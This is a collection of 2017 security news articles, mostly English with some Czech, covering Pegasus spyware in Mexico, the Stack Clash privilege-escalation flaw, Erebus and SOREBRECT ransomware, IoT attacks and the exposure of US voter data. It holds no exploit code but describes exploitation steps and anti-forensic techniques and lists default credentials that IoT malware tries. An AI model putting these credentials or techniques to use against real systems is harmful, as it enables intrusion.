Studie přinesla také porovnání mezi jednotlivými světovými regiony. Ze statistik vyplývá, že v roce 2016 bylo k internetu připojeno 44 % světové populace. V roce 2021 se zvýší počet uživatelů internetu ze současných 3,3 miliard na 4.6 miliard, bude tak připojeno 58 % všech lidí na světě. Výrazně se zvýší také počet připojených zařízení na jednoho člověka. Na jednoho člověka připadalo 2,3 zařízení (2016) a tento počet naroste na 3,5 (2021). Průměrná rychlost připojení se v roce 2021 zvýší ze 27,5 Mb/s na 53 Mb/s a na každého člověka připadne měsíčně 35,5 GB přenesených dat.

V regionu střední a východní Evropy (CEE) bude tento vývoj obdobrný. V roce 2016 zde bylo připojeno 60 % populace, což se v roce 2021 zvýší na 72 %. V regionu CEE má dnes každý občan v průměru 2,5 zařízení připojená k internetu, v roce 2021 to bude už 3,8. Průměrné připojení dosáhne rychlosti 45,5 Mb/s a na jednoho člověka připadne 34,7 GB přenesených dat.

Rostoucí internetový provoz bude také velkou výzvou pro kybernetickou bezpečnost. Nejenže útočníci přicházejí se stále sofistikovanějšími typy malware, ale neustále se zvyšuje i síla DDoS útoků, která v průměru dosahuje 1,2 Gb/s. Takový tok dokáže vyřadit většinu organizací. Maximální síla se každoročně zvyšuje zhruba o 60 % a ve chvíli nejsilnějšího útoku může jeho internetový provoz představovat až 18 % provozu celého státu. Průměrná velikost DDoS útoku se každoročně zvyšuje až o 22 %, což koresponduje s nárůstem globálního internetového provozu (29 %). Zvyšuje se ale i jejich počet. V roce 2021 bude světově takových útoků podle předpovědi asi 3,1 milionů.


Mexican Government was spying on Journalists and Activists with Pegasus Surveillance software
20.6.2017 securityaffairs BigBrothers

Journalists and activists in Mexico accused the government of spying on them with the powerful surveillance software Pegasus developed by the NSO Group.
Journalists and activists in Mexico accused the government of spying on them with a powerful surveillance software. According to the journalists, the authorities used an Israeli spyware to hack their mobile devices. The surveillance software is the questionable Pegasus that is developed by the Israeli surveillance NSO Group and sold exclusively to the governments and law enforcement agencies.

NSO Group is owned by US private equity firm Francisco Partners Management. it made the headlines after the investigation conducted by The New York Times.

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”

The discovery is the result of an investigation conducted by Mexican NGOs and the CitizenLab organization.

R3D, SocialTic, Article 19 and CitizenLab published a report that details the surveillance illegally operated by the Mexican government through the spyware.

Authorities have been sending malicious links to individuals’ phones, in order to trick victims into opening the messages they were specifically crafted and in some cases, the attack involved also family members if the victims were not compromised.

“The targets received SMS messages that included links to NSO exploits paired with troubling personal and sexual taunts, messages impersonating official communications by the Embassy of the United States in Mexico, fake AMBER Alerts, warnings of kidnappings, and other threats.” states the report. “The operation also included more mundane tactics, such as messages sending fake bills for phone services and sex-lines. Some targets only received a handful of texts, while others were barraged with dozens of messages over more than one and a half years. A majority of the infection attempts, however, took place during two periods: August 2015 and April-July 2016″.

Mexican Govenment surveillance

The Pegasus spyware leverages zero-day exploits to compromise both iOS and Android devices.

The government targeted individuals that exposed evidence on government corruption and activists who revealed human rights violations by the Mexican Government.

The researchers observed at least two periods of intense targeting:

Period 1 (August 2015) when the Mexican President was officially exonerated for his role in the “Casa Blanca” scandal on which Carmen Aristegui, a well-known reporter, had first reported, and Carlos Loret de Mola was questioning the government’s role in extrajudicial killings. Aristegui revealed that President Enrique Pena Nieto’s wife had bought a $7 million Mexico City mansion from a government contractor.
Period 2 (April- July 2016) when revelations of government involvement in human rights abuses and extra-judicial killings were made public.
Mexican Government spyware

According to the New York Times report, at least three Mexican federal agencies have purchased some $80 million of spyware from NSO Group since 2011.

Companies like the NSO Group operate in the dark, in a sort of “legal gray area,” despite the Israeli government exercises strict control of the export of such kind of software, surveillance applications could be abused by threat actors and authoritarian regimes worldwide.

Let me close with Key Findings of the report

Over 76 messages with links to NSO Group’s exploit framework were sent to Mexican journalists, lawyers, and a minor child (NSO Group is a self-described “cyber warfare” company that sells government-exclusive spyware).
The targets were working on a range of issues that include investigations of corruption by the Mexican President, and the participation of Mexico’s Federal authorities in human rights abuses.
Some of the messages impersonated the Embassy of the United States of America to Mexico, others masqueraded as emergency AMBER Alerts about abducted children.
At least one target, the minor child of a target, was sent infection attempts, including a communication impersonating the United States Government, while physically located in the United States.


Stack Clash vulnerability allows an attacker to execute code as root
20.6.2017 securityaffairs
Vulnerebility

Stack Clash is a local privilege escalation flaw in Linux, BSD, Solaris and other open source systems that allows an attacker to execute code as root.
Linux, BSD, Solaris and other open source systems are vulnerable to a local privilege escalation vulnerability known as Stack Clash that allows an attacker to execute code as root.

Stack Clash is a local privilege escalation vulnerability tracked as CVE-2017-1000364 that affects some open source systems, including Linux, BSD, and Solaris.

The Stack Clash affects the memory management of several OSs, it can be exploited by attackers to corrupt memory and execute arbitrary code.

Security patches have been released today for many Linux and open source distros, and systems running Linux, OpenBSD, NetBSD, FreeBSD or Solaris on i386 or amd64 hardware should be updated soon.

Experts warn of the possibility to chain this flaw with other vulnerabilities to run arbitrary code with the highest privileges.

Researchers at Qualys who discovered this vulnerability have developed seven exploits and seven proofs of concept for this weakness.

“The exploits and proofs of concept that we developed in the course of our research are all Local Privilege Escalations: an attacker who has any kind of access to an affected system can exploit the Stack Clash vulnerability and obtain full root privileges.” states Qualys .

The stack is the memory region used by a program during its execution, it grows automatically when the program needs more stack memory. It this region grows too much it can interfere with the stack of another process, an attacker can force the growth to overwrite another memory region.

“Why is it called the Stack Clash? The first step in exploiting this vulnerability is to collide, or clash, the stack with another memory region. Hence the name: the Stack Clash.” continues the analysis.
The attack bypasses the stack guard-page protection against stack-clashes implemented in Linux in 2010.

The proof of concept exploits is composed of the following steps:

“Clashing” the stack with another memory region: we allocate memory until the stack reaches another memory region, or until another memory region reaches the stack;” states the security advisory published by Qualys.

“Jumping” over the stack guard-page: we move the stack-pointer from the stack and into the other memory region, without accessing the stack guard-page;”

“Smashing” the stack, or the other memory region: we overwrite the stack with the other memory region, or the other memory region with the stack.”

Stack Clash linux

Is it exploitable remotely?

The researchers do not know of any remotely exploitable application, however thay don’t exclude remote exploitation of the Stack Clash.

“The one remote application that we did investigate (the Exim mail server) turned out to be unexploitable by sheer luck.” states the advisory.

In order to temporarily mitigate the attack, Qualys recommends increasing the size of the stack guard-page to 1MB at a minimum.

The advisory also recommends recompiling all userland code with the –fstack-check option in order to prevent the stack pointer from moving into other memory regions.


Web Hosting Company Pays $1 Million to Ransomware Hackers to Get Files Back
20.6.2017 thehackernews 
Ransomware

South Korean web hosting provider has agreed to pay $1 million in bitcoins to hackers after a Linux ransomware infected its 153 servers, encrypting 3,400 business websites and their data, hosted on them.
According to a blog post published by NAYANA, the web hosting company, this unfortunate event happened on 10th June when ransomware malware hit its hosting servers and attacker demanded 550 bitcoins (over $1.6 million) to unlock the encrypted files.
However, the company later negotiated with the cyber criminals and agreed to pay 397.6 bitcoins (around $1.01 million) in three installments to get their files decrypted.
The hosting company has already paid two installments at the time of writing and would pay the last installment of ransom after recovering data from two-third of its infected servers.
According to the security firm Trend Micro, the ransomware used in the attack was Erebus that was first spotted in September last year and was seen in February this year with Windows’ User Account Control bypass capabilities.

Since the hosting servers were running on Linux kernel 2.6.24.2, researchers believe that Erebus Linux ransomware might have used known vulnerabilities, like DIRTY COW; or a local Linux exploits to take over the root access of the system.
“The version of Apache NAYANA used is run as a user of nobody(uid=99), which indicates that a local exploit may have also been used in the attack,” researchers note.
“Additionally, NAYANA’s website uses Apache version 1.3.36 and PHP version 5.1.4, both of which were released back in 2006.”
Erebus, the ransomware primarily targeting users in South Korea, encrypts office documents, databases, archives, and multimedia files using the RSA-2048 algorithm and then appends them with a .ecrypt extension before displaying the ransom note.
“The file is first scrambled with RC4 encryption in 500kB blocks with randomly generated keys,” researchers say. “The RC4 key is then encoded with AES encryption algorithm, which is stored in the file. The AES key is again encrypted using RSA-2018 algorithm that is also stored in the file.”
The public key which is generated locally is shared, while the private key is encrypted using AES encryption and another randomly generated key.
According to analysis conducted by the Trend Micro researchers, decryption of infected files is not possible without getting hold of the RSA keys.
So, the only safe way of dealing with ransomware attacks is prevention. As we have previously recommended, the best defense against Ransomware is to create awareness within the organizations, as well as to maintain back-ups that are rotated regularly.
Most viruses are introduced by opening infected attachments or clicking on links to malware usually in spam emails. So, DO NOT CLICK on links provided in emails and attachments from unknown sources.
Moreover, ensure that your systems are running the latest version of installed applications.


A Decade Old Unix/Linux/BSD Root Privilege-Escalation Bug Discovered
20.6.2017 thehackernews 
Vulnerebility
Stack-Clash-Privilege-Escalation-Vulnerability
Security researchers have discovered more than a decade-old vulnerability in several Unix-based operating systems — including Linux, OpenBSD, NetBSD, FreeBSD and Solaris — which can be exploited by attackers to escalate their privileges to root, potentially leading to a full system takeover.
Dubbed Stack Clash, the vulnerability (CVE-2017-1000364) has been discovered in the way memory was being allocated on the stack for user space binaries.
Exploiting Stack Clash Bug to Gain Root Access
The explanation is simple: Each program uses a special memory region called the stack, which is used to store short-term data. It expands and contracts automatically during the execution of any program, depending upon the needs of that program.
According to researchers at Qualys, who discovered and reported this bug, a malicious program can attempt to use more memory space than available on the stack, which could overflow the memory, causing it to collide or clash with nearby memory regions and overwrite their content.
Moreover, the Stack Clash exploit can also bypass the stack guard-page, a memory management protection introduced in 2010, after this issue was exploited in 2005 and 2010.
"Unfortunately, a stack guard-page of a few kilobytes is insufficient: if the stack-pointer 'jumps' over the guard-page—if it moves from the stack into another memory region without accessing the guard-page—then no page-fault exception is raised and the stack extends into the other memory region," an advisory published by Qualys read.
The Stack Clash vulnerability requires local access to the vulnerable system for exploitation, but researchers said it could be exploited remotely depending upon the applications.
For example, a malicious customer with low privilege account with a web hosting company, running vulnerable system, could exploit this vulnerability to gain control over other websites running on the same server, as well as remotely gain root access and execute malicious code directly.
Just yesterday, we reported that how a web hosting company fell victim to a similar attack used to infect Linux servers with a ransomware malware, causing the company to pay more than $1 Million in ransom to get back their files.
Attackers can also combine the Stack Clash bug with other critical vulnerabilities, like the Sudo vulnerability recently patched, and then run arbitrary code with the highest privileges, said Qualys researchers.
7 Proof-of-Concept Exploits
The researchers said they were able to develop seven exploits and seven proofs of concept (PoCs) for the Stack Clash vulnerability, which works on Linux, OpenBSD, NetBSD, FreeBSD and Solaris on 32-bit and 64-bit x86 processors.
However, the researchers have not yet published the exploits and proofs of concept, giving users and admins enough time to patch their systems before they go into the Stack Clash exploits public.
The PoCs follow four steps, which include 'Clashing' the stack with another memory region, running the stack pointer to the stack’s start, 'Jumping' over the stack guard-page and 'Smashing' the stack or the other memory regions.
Among distros and systems affected by Stack Clash include:
Sudo on Debian, Ubuntu, and CentOS
ld.so and most SUID-root binaries on Debian, Ubuntu, Fedora, and CentOS
Exim on Debian
rsh on Solaris 11 and so on
Red Hat Enterprise
The company also believes that other operating systems, including Microsoft's Windows, Apple's OS X/macOS and Google's Linux-based Android OS could also be vulnerable to Stack Clash, though it is yet to be confirmed.
Patch Available; Update Now
Many affected vendors have already issued security patches for the bug, so users and administrators are advised to install patches a soon as possible.
If security patches from your vendor are yet to be released, you can reboot your systems or can manually apply stack limits to local users' applications. Simply, set the hard RLIMIT STACK and RLIMIT_AS of local users and remote services to a low value.
It is also recommended to recompile all userland code (ld.so, libraries, binaries) with the –fstack-check feature. This would prevent the stack pointer from moving into another memory region without accessing the stack guard-page and would kill Stack Clash dead.


Mexican Journalists, Activists Accuse Govt of Spying on Them

20.6.2017 securityweek BigBrothers
A group of prominent journalists and activists in Mexico accused the government Monday of spying on them, saying their phones had been hacked with Israeli spyware sold exclusively to the state.

The group has pressed charges with the attorney general's office, accusing the government of illegally accessing private communications and other offenses, it announced at a press conference.

The nine plaintiffs at the press conference included journalists who have published embarrassing exposes on government corruption and activists who have investigated human rights violations by the state.

"This is an operation by the Mexican state, in which state agents -- far from doing what they should legally do -- have used our resources, our taxes, our money to commit serious abuses," said journalist Carmen Aristegui.

Aristegui, a well-known reporter, is known in Mexico for a 2014 expose revealing that President Enrique Pena Nieto's wife had bought a $7 million Mexico City mansion from a government contractor.

She is among the 76 cases the plaintiffs say they have documented of high-tech spyware being installed on their phones and those of their families and associates.

"What does the Mexican president have to say today about this treacherous, illegal spying?" Aristegui said.

Victims said they received text messages with eye-catching news headlines, social media posts or even communications from the United States embassy -- all of which were fake.

The messages would prompt users to click on a link that would secretly install the spyware on their phones.

The software in question, known as Pegasus, effectively turns a target's cell phone into a pocket spy, accessing the user's communications, camera and microphone to enable a highly detailed level of surveillance.

The accusation came as The New York Times published a report detailing how Pegasus was used against top human rights lawyers, journalists and anti-corruption activists in Mexico.

The spyware is made by a secretive Israeli firm called NSO Group, owned by US private equity firm Francisco Partners Management.

According to the Times report, at least three Mexican federal agencies have purchased some $80 million of spyware from NSO Group since 2011.

The company, which claims it only sells Pegasus to governments, says it has an agreement with clients that the software be used only to target terrorists and criminals.


Republican Party Contractor Exposes Details of 198 Million American Voters

20.6.2017 securityweek BigBrothers
More than 1 terabytes of data compiled by three contractors of the U.S. Republican Party, including the details of 198 million American voters, were stored in a misconfigured database that could have been accessed by anyone, according to cyber resilience startup UpGuard.

Researcher Chris Vickery, who recently joined UpGuard as a risk analyst, discovered the unprotected Amazon Web Services (AWS) S3 bucket containing the data on June 12. Federal authorities were notified on June 14 – after all the data was downloaded – and the database was secured on the same day.

The database included information such as name, date of birth, home address, phone number, voter registration status, political views, and data on race and ethnicity.American voter data exposed by Republicans

UpGuard’s analysis showed that the unprotected cloud server was managed by Deep Root Analytics, a company that offers a data management platform for targeted TV advertising. The firm, which bills itself as “the most experienced group of targeters in Republican politics,” has taken responsibility for the incident.

Deep Root Analytics said the exposed data included both proprietary information and publicly available voter data. The company said there was no evidence that anyone other than Vickery accessed the files.

According to UpGuard, the exposed files suggested that at least two other companies, TargetPoint Consulting and Data Trust, also contributed to the database. TargetPoint is a market research and knowledge management firm whose services were used by President George W. Bush in his 2004 campaign, and Data Trust is the “exclusive data provider” of the Republican National Committee (RNC).

Deep Root Analytics, TargetPoint Consulting and Data Trust all played an important role in the recent campaign of President Donald Trump.

“Like political operatives, hackers constantly search for ways to move a person to take a particular action. This database, with political preferences and other private information for millions of Americans, is a treasure trove for creative hackers,” said Adam Levin, chairman and founder of CyberScout. “They can pose as anyone from a political action committee or local voting board to the IRS or a bank in phishing emails, to coax additional information from voters, such as social security numbers for identity theft, or they can influence the voting process directly.”

“Any organization that collects and stores data such as voter information must exercise the highest level of cyber hygiene. This includes repeated penetration testing and searches for and patches to new vulnerabilities as well as continual monitoring for unusual data exfiltration,” Levin added.

As for Deep Root Analytics’ failure to secure the data, Paul Fletcher, cyber security evangelist at Alert Logic, pointed out that Amazon offers the tools needed to protect cloud instances.

“The fact that this exposure was discovered on a public cloud site is irrelevant, in fact, if the AWS suite of security tools and log collection capabilities were properly implemented, this massive data exposure could’ve been avoided. The Amazon S3 server comes by default with an access control list (ACL), which needs to be properly set up, maintained and audited by the organization (and in this case), the organization’s customer – the GOP,” Fletcher told SecurityWeek. “Extra security is also available using server side encryption, again offered by AWS, but the responsibility to implement this solution is up to the public cloud customer.”

This was not the first time Vickery discovered an exposed database containing the details of U.S. voters. Back in December 2015, he stumbled upon personal information on 191 million Americans. A few months later, he identified a database storing the records of Mexican voters.


Na internet se omylem dostala osobní data 200 miliónů Američanů

19.6.2017 Novinky/Bezpečnost BigBrother
Osobní údaje téměř 200 miliónů Američanů byly volně k nahlédnutí na internetu kvůli chybě způsobené při jejich zpracování. Na veřejně přístupný server je omylem umístila analytická firma pracující pro Republikánskou stranu. Data včetně adres či telefonních čísel byla přístupná možná až několik měsíců, informují americká média.
Balík dat o velikosti 1,1 terabytů objevil expert na kybernetickou bezpečnost Chris Vickery v nezakódovaném cloudovém úložišti. Umístila ho tam společnost Deep Root Analytics, která před loňskými volbami pracovala na voličských analýzách pro republikány.

„Bereme na sebe veškerou odpovědnost za tuto situaci. Na základě dosavadních informací se nedomníváme, že by na nás zaútočili hackeři,” řekl zakladatel firmy Alex Lundry webu Gizmodo.com, který o věci informoval. Jak dlouho byla data veřejně přístupná, neuvedl, dodal pouze, že již byla zakódována.

Společnost data podle médií naposledy aktualizovala v lednu. Vedle jmen, adres a telefonů databáze obsahovala mimo jiné data narození či u které politické strany se dotyčný registroval k volbám.

Americké strany běžně využívají obsáhlé databáze voličů, které se před volbami snaží velmi aktivně oslovovat. K podobně rozsáhlému zveřejnění podle dostupných informací ale došlo patrně vůbec poprvé.

„Je to velmi znepokojující. Nejsou to jen citlivé, ale ty nejcitlivější informace, z nichž lze vyčíst, jak se lidé chovají, jaké mají názory a přesvědčení,” řekla stanici BBC Frederike Kaltheunerová z nevládní společnosti Privacy International, podle níž podobně velké objemy dat nesbírají jen politické strany, ale i internetové marketingové firmy.


Google Steps Up Efforts to Block Extremism, Following Facebook

19.6.2017 securityweek Social
Google is stepping up its efforts to block "extremist and terrorism-related videos" over its platforms, using a combination of technology and human monitors.

The measures announced Sunday come on the heels of similar efforts unveiled by Facebook last week, and follow a call by the Group of Seven leaders last month for the online giants to do more to curb online extremist content.

"While we and others have worked for years to identify and remove content that violates our policies, the uncomfortable truth is that we, as an industry, must acknowledge that more needs to be done," said a blog post by Google general counsel Kent Walker.

Walker said Google would devote more resources to apply artificial intelligence to suppress YouTube videos used in support of extremist actions.

"This can be challenging: a video of a terrorist attack may be informative news reporting if broadcast by the BBC, or glorification of violence if uploaded in a different context by a different user," he said.

"We will now devote more engineering resources to apply our most advanced machine learning research to train new 'content classifiers' to help us more quickly identify and remove extremist and terrorism-related content."

Google acknowledged that technology alone cannot solve the problem, and said that it would "greatly increase the number of independent experts" on the watch for videos that violate its guidelines.

"Machines can help identify problematic videos, but human experts still play a role in nuanced decisions about the line between violent propaganda and religious or newsworthy speech," Walker said.

Google plans to add 50 non-government organizations to the 63 it already works with to filter inappropriate content.

"This allows us to benefit from the expertise of specialized organizations working on issues like hate speech, self-harm, and terrorism," Walker wrote.

"We will also expand our work with counter-extremist groups to help identify content that may be being used to radicalize and recruit extremists."

A similar initiative was announced last week by Facebook, which earlier this year said it was adding 3,000 staff to track and remove violent video content.

Google's Walker said the online giant would start taking "a tougher stance on videos that do not clearly violate our policies," including videos that "contain inflammatory religious or supremacist content."

He said YouTube would expand its role in counter-radicalization efforts using an approach that "harnesses the power of targeted online advertising" to reach potential recruits for extremist groups and offers "video content that debunks terrorist recruiting messages."


Fileless, Code-Injecting Ransomware SOREBRECT Emerges

19.6.2017 securityweek Ransomware
A newly discovered ransomware family incorporates a combination of fileless attack and code-injection, Trend Micro security researchers warn.

Dubbed SOREBRECT, the threat was initially spotted a couple of months ago, when it managed to infect the systems and networks of organizations in the Middle East. The ransomware packs unusual encryption techniques, is abusing the PsExec utility to leverage code injection, and also focuses on remaining stealthy, the security company says.

The ransomware was fitted with a self-destruct routine that turns it into a fileless threat: it injects code into a legitimate system process before terminating its main binary. Furthermore, it goes to lengths to delete the affected system’s event logs and other artifacts in an attempt to hinder forensic analysis and prevent researchers from tracking the threat’s activities.

When discovered, SOREBRECT had a low distribution and concentrated on Middle Eastern countries like Kuwait and Lebanon. By early May, however, it was already found on computers in Canada, China, Croatia, Italy, Japan, Mexico, Russia, Taiwan, and the U.S., infecting industries including manufacturing, technology, and telecommunications.

“Given ransomware’s potential impact and profitability, it wouldn’t be a surprise if SOREBRECT turns up in other parts of the world, or even in the cybercriminal underground where it can be peddled as a service,” Trend Micro says.

During attacks, the malware abuses PsExec, a legitimate Windows command-line utility used by system admins to execute commands or run executable files on remote systems. This, researchers say, means that attackers are already in the possession of administrator credentials or that the remote machines were exposed or brute-forced.

SOREBRECT, however, isn’t the first ransomware family to misuse PsExec, with SamSam, Petya, and its derivative, PetrWrap also abusing the utility to install the ransomware on compromised servers or endpoints. The new threat, however, maliciously deploys PsExec and performs code injection.

“It injects its code into Windows’ svchost.exe process, while the main binary self-destructs. The combination is potent: once the deployed ransomware binary finishes execution and self-termination, the injected svchost.exe—a legitimate Windows service-hosting system process—resumes the execution of the payload (file encryption),” Trend Micro explains.

The researchers also argue that the ransomware’s code injection capability makes the attack more effective compared to using the Remote Desktop Protocol (RDP). Through PsExec, attackers can remotely execute commands, instead of providing a log-in session or manually transferring the malware to the target machine.

The ransomware also uses wevtutil.exe to delete the system’s event logs, and vssadmin to delete shadow copies, thus covering its tracks and preventing users from recovering their files. The malware also uses the TOR network to communicate with its command and control (C&C) server.

The threat can also encrypt files on network shares, the researchers warn. For that, it scans the network for asset discovery and enumerates open shares, including folders, content or peripherals that are readily accessible through the network. Next, it initiates a connection to the discovered share and, if both read and write access are available, it encrypts it.

To stay protected, IT/system administrators and information security professionals are advised to restrict user write permissions and limit privileges for PsExec. As usually, keeping files backed up at all times and both systems and networks updated can prove helpful in case of an attack. Training employees on security and deploying multilayered security mechanisms are also highly important.


Cameras Top Source of IoT Attacks: Kaspersky

19.6.2017 securityweek IoT
Honeypots set up by Kaspersky Lab have provided some interesting information on Internet of Things (IoT) attacks, including the types of hacking attempts, attack sources, and the geographical distribution of compromised devices.

The security firm’s honeypots, designed to mimic various devices running Linux, were targeted within seconds of being deployed, and the number of attack attempts coming from unique IP addresses reached nearly 100,000 on some days.

These attacks often come from malware-infected devices that attempt to hijack other vulnerable systems. The compromised devices become part of botnets such as Mirai, Persirai and Amnesia, which are typically used to launch distributed denial-of-service (DDoS) attacks.

Roughly 85 percent of attempts leveraged the telnet protocol, while the rest used SSH. In the case of telnet attacks, the most common default credentials tried out by malware are root: xc3511, root:vizxv and admin: admin. The most commonly used credentials in the case of SSH are admin:default, admin:admin and support:support.

More than 63 percent of the attacks observed by Kaspersky came from DVR and IP camera systems, and nearly 20 percent came from routers and other networking devices.

A ZoomEye search conducted by researchers revealed nearly 7.5 million potentially vulnerable camera systems, and roughly 4 million potentially vulnerable routers.

Experts also pointed out that the attacks came from both home devices and networks housing enterprise-grade hardware, including point-of-sale (PoS) devices, TV broadcasting systems, physical security systems, environmental monitoring devices, programmable logic controllers (PLCs), power management systems, and a seismic monitoring station in Thailand.

As for the geographical distribution of the devices launching attacks on IoT systems, many were located in China (14%), Vietnam (12%), Russia (7%), Brazil (6%), Turkey (6%), Taiwan (6%) and Iran (4%).

Kaspersky has so far this year recorded more than 2 million attacks and over 11,000 unique IP addresses that served IoT malware. A majority of the IPs were located in Vietnam (2,100 IPs), Taiwan (1,300 IPs), Brazil (1,100 IPs), Turkey (700 IPs), South Korea (600 IPs), India (500 IPs) and the U.S. (430 IPs).

As for the number of malware downloads, a total of nearly 2 million downloads were traced to Thailand, Hong Kong, South Korea, the Netherlands, the United States and Seychelles.

“The existing competition in the DDoS market drives cybercriminals to look for new resources to launch increasingly powerful attacks. The Mirai botnet has shown that smart devices can be harnessed for this purpose – already today, there are billions of these devices globally, and by 2020 their number will grow to 20-50 billion devices, according to predictions by analysts at different companies,” Kaspersky researchers said in a blog post.


Quantum Computing's Threat to Public-key Cryptosystems

19.6.2017 securityweek Krypto
Quantum cryptography and Encryption Challenges

The Quantum Cryptography Problem

Fittingly, while we do know a little about 'what', we actually know little about 'where' (in time) we will get commercially viable quantum computers. The 'what' includes massively increased computational power. The 'when' is thought to be some time within the next 15 to 30 years.

When these two features are combined, we get the quantum cryptography problem: what are we going to do with current public-key encryption? Last year, scientists from Google and NASA suggested that D-Wave quantum technology could provide computing 100 million times faster than current conventional technology. This sort of power will 'break' current public-key cryptosystems.

As long ago as 1994, Peter Shor developed a quantum algorithm to factor large prime numbers. It was not considered an urgent problem at the time, given the lack of quantum computers. Today, however, quantum computing is much closer. If it becomes commercially viable within the next 15 years, then cryptography already has a problem -- the world's data currently protected by algorithms such as RSA, the world's most popular public-key cryptosystem, will become readable. If it takes nearer thirty years, then there is potentially time to solve the problem.

The problem arises from the length of time it takes to develop and test new cryptography, and then to re-tool existing infrastructures with the new quantum-resistant algorithms. The solution is for security to develop 'quantum-safe' public-key cryptography as soon as possible. It is not thought so pressing for symmetric crypto systems -- that problem can probably be solved by using larger keys for symmetric algorithms such as AES and Triple DES, and by using longer output from hash functions.

Last year NIST announced a new competition (PDF) to develop quantum-resistant public-key cryptography. It called for proposals in the Fall of 2016, with a deadline of November 30, 2017. It expects a 3-5-years analysis phase, with draft standards after a further two years. It announced that it would start to accept submissions on December 15, 2016.

One potential candidate was described by academics in France and Singapore on May 30, 2017 in a paper titled 'A New Public-Key Cryptosystem via Mersenne Numbers' (PDF). Mersenne numbers have long captured the imagination of mathematicians seeking an improvement to current public-key systems -- but not universally.

In 2009, Nathaniel Johnston, assistant professor at Mount Allison University, Canada, wrote, "Like all good myths, the Mersenne prime cryptography myth is so widespread because it is so close to being true." But the early interest in Mersenne numbers was that they could simply replace prime numbers with much larger prime numbers. This, according to Johnston, is the fallacy.

The new paper is different. "My comment was aimed at the idea that Mersenne primes can be used in RSA encryption (the 'standard' encryption scheme based on prime numbers), which is very false. However, [this paper] is about an entirely new encryption scheme that is built specifically around Mersenne numbers and Mersenne primes (and doesn't work with other primes). I have no reason to believe that there's any problem with this new scheme or its use of Mersenne numbers/primes."

The proposed new cryptosystem, says the paper, "is based on arithmetic modulo so called Mersenne numbers, i.e., numbers of the form p = 2^n - 1, where n is a prime." It does not necessarily require that n is a Mersenne prime, but prefers it. There is a known partial attack when n is not prime, but the paper adds, "we are not aware of any attacks even if p = 2^n - 1 for any large enough prime n. If we are willing to relax this requirement, then we can choose other values of n to get the desired security."

The paper describes theoretical attacks against its proposal, including lattice-based attacks, meet-in-the-middle attacks, and guess and win attacks. In general, it finds the theory stands up well; but less so for active attacks that ask for the decryption of incorrectly formed ciphertext and use the answers to recover information about the key. The authors' solution is to include "a transformation specifically designed for our bit-by-bit encryption."

"In this paper," the authors conclude, "we propose a simple new public-key encryption scheme. As with other public-key cryptosystems, the security of our cryptosystem relies on unproven assumptions... we mentioned some unsuccessful attempts we made at trying to break this scheme, and this led us to conjecture the security guarantee of our scheme." To verify their own conclusions, the authors urge other cryptographers "to try and find attacks on our scheme"; either conventional or quantum.

It may be that the results of any such feed-back will determine whether the authors will specifically submit their proposal to the NIST quantum-resistant competition before the November deadline. SecurityWeek has reached out to the authors to see if this is the plan, and will update this article with any response it receives. What is clear, however, is the increasingly urgent search for quantum-safe public-key cryptography is now in full swing.


Web Hosting Provider Pays $1 Million to Ransomware Attackers

19.6.2017 securityweek Ransomware
South Korean web hosting company Nayana agreed to pay $1 million in Bitcoin after a ransomware attack hit 153 Linux servers.

The attack took place June 10 and resulted in over 3,400 business websites the company hosts being encrypted. According to the Nayana’s initial announcement, the attacker demanded 550 Bitcoins (over $1.6 million) to decrypt the infected files. Following negotiations, they lowered the ransom demand to 397.6 Bitcoins (around $1.01 million).

The payments, the company announced, will be made in three batches, and the attackers will decrypt the affected servers accordingly. Two payments were already made, and the company is currently in the process of recovering the data from the first two server batches.

The ransomware used in this attack, Trend Micro reveals, was Erebus, a piece of malware that was initially spotted in September 2016 and which was already seen in attacks earlier this year, when it packed Windows User Account Control bypass capabilities.

Apparently, someone ported the ransomware to Linux and is using it to target vulnerable servers. Running on Linux kernel 2.6.24.2, which was compiled back in 2008, Nayana’s website is vulnerable to a great deal of exploits that could provide attackers with root access to the server, such as DIRTY COW, Trend Micro notes.

The company’s website also uses Apache version 1.3.36 and PHP version 5.1.4, both released in 2006 and known to include vulnerabilities. Most likely, the vulnerable Linux installation was used as an entry point to run the Erebus ransomware on Nayana’s systems. The Apache version that Nayana uses runs as a user of nobody(uid=99) and “a local exploit may have also been used in the attack,” the researchers say.

The ransomware appears heavily targeted to South Korea, although samples were submitted to VirusTotal from Ukraine and Romania too (Trend Micro suggests that there might be other researchers who have found the malware).

Erebus uses a sophisticated encryption method that makes decryption difficult without the RSA keys. The malware uses the RSA algorithm to encrypt AES keys and each infected file is encrypted with a unique AES key. However, the RSA-2048 public key is shared.

“The file is first scrambled with RC4 encryption in 500kB blocks with randomly generated keys. The RC4 key is then encoded with AES encryption algorithm, which is stored in the file. The AES key is again encrypted using RSA-2018 algorithm that is also stored in the file,” Trend Micro explains.

The ransomware targets Office documents, databases, archives, and multimedia files, being able to encrypt a total of 433 file types. However, the malware was built specifically to target and encrypt web servers and data stored in them, the researchers say.

“As exemplified by Nayana, Linux is an increasingly popular operating system and a ubiquitous element in the business processes of organizations across various industries—from servers and databases to web development and mobile devices. Data centers and hosting/storage service providers also commonly use machines running Linux, for instance,” Trend Micro concludes.


Database of Over 198 Million U.S. Voters Left Exposed On Unsecured Server
19.6.2017 thehackernews  Incindent

Information on more than 198 Million United States citizens, that's over 60% of the US population, was exposed in what's believed to be the largest ever known exposure of voter-related to date.
This blunder was caused by Deep Root Analytics (DRA), a data analytics firm employed by the US Republican National Committee (RNC), who "mistakenly" left sensitive personal details of more than 198 million US voters exposed on an unsecured Amazon S3 server.
Chris Vickery, a security researcher at UpGuard, who discovered the exposed database said anyone could have downloaded more than a Terabytes of files containing voters data without the need for any password from the Amazon S3 server maintained by DRA.
Vickery is the same security researcher who discovered over 191 million voter records stored in an unsecured database in late 2015. In April, Vickey also reported information on 93 million Mexican voters.

Vickery discovered the exposed databases on June 12, which included uniquely identified data on each voter, including their first and last name, date of birth, phone number, home and mailing address, party affiliation, voter registration data, and ethnicity, along with a flag should the person appear on the federal Do-Not-Call registry.
Deep Root Analytics, which is a big data analytics firm that helps advertisers identify audiences for political ads, confirmed to the Gizmodo in a statement on Monday, saying "We take full responsibility for this situation."
